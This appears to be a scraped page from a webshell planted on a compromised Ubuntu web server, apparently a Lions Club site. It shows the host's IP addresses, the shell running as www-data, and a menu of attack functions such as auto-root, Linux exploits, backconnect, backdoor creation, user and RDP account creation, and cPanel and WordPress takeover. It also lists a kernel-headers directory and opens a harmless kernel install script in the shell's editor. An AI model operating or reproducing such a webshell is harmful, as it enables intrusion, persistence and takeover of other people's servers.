Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 13.58.2.42
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-4.15.0-213 /
arch /
m68k /
[ HOME SHELL ]
Name
Size
Permission
Action
68000
[ DIR ]
drwxr-xr-x
amiga
[ DIR ]
drwxr-xr-x
apollo
[ DIR ]
drwxr-xr-x
atari
[ DIR ]
drwxr-xr-x
bvme6000
[ DIR ]
drwxr-xr-x
coldfire
[ DIR ]
drwxr-xr-x
emu
[ DIR ]
drwxr-xr-x
fpsp040
[ DIR ]
drwxr-xr-x
hp300
[ DIR ]
drwxr-xr-x
ifpsp060
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
kernel
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mac
[ DIR ]
drwxr-xr-x
math-emu
[ DIR ]
drwxr-xr-x
mm
[ DIR ]
drwxr-xr-x
mvme147
[ DIR ]
drwxr-xr-x
mvme16x
[ DIR ]
drwxr-xr-x
q40
[ DIR ]
drwxr-xr-x
sun3
[ DIR ]
drwxr-xr-x
sun3x
[ DIR ]
drwxr-xr-x
tools
[ DIR ]
drwxr-xr-x
Kconfig
3.22
KB
-rw-r--r--
Kconfig.bus
2.12
KB
-rw-r--r--
Kconfig.cpu
12.51
KB
-rw-r--r--
Kconfig.debug
1.37
KB
-rw-r--r--
Kconfig.devices
4.38
KB
-rw-r--r--
Kconfig.machine
12.47
KB
-rw-r--r--
Makefile
5.15
KB
-rw-r--r--
install.sh
1.24
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install.sh
#!/bin/sh # # This file is subject to the terms and conditions of the GNU General Public # License. See the file "COPYING" in the main directory of this archive # for more details. # # Copyright (C) 1995 by Linus Torvalds # # Adapted from code in arch/i386/boot/Makefile by H. Peter Anvin # # "make install" script for m68k architecture # # Arguments: # $1 - kernel version # $2 - kernel image file # $3 - kernel map file # $4 - default install path (blank if root directory) # verify () { if [ ! -f "$1" ]; then echo "" 1>&2 echo " *** Missing file: $1" 1>&2 echo ' *** You need to run "make" before "make install".' 1>&2 echo "" 1>&2 exit 1 fi } # Make sure the files actually exist verify "$2" verify "$3" # User may have a custom install script if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi # Default install - same as make zlilo if [ -f $4/vmlinuz ]; then mv $4/vmlinuz $4/vmlinuz.old fi if [ -f $4/System.map ]; then mv $4/System.map $4/System.old fi cat $2 > $4/vmlinuz cp $3 $4/System.map sync
Close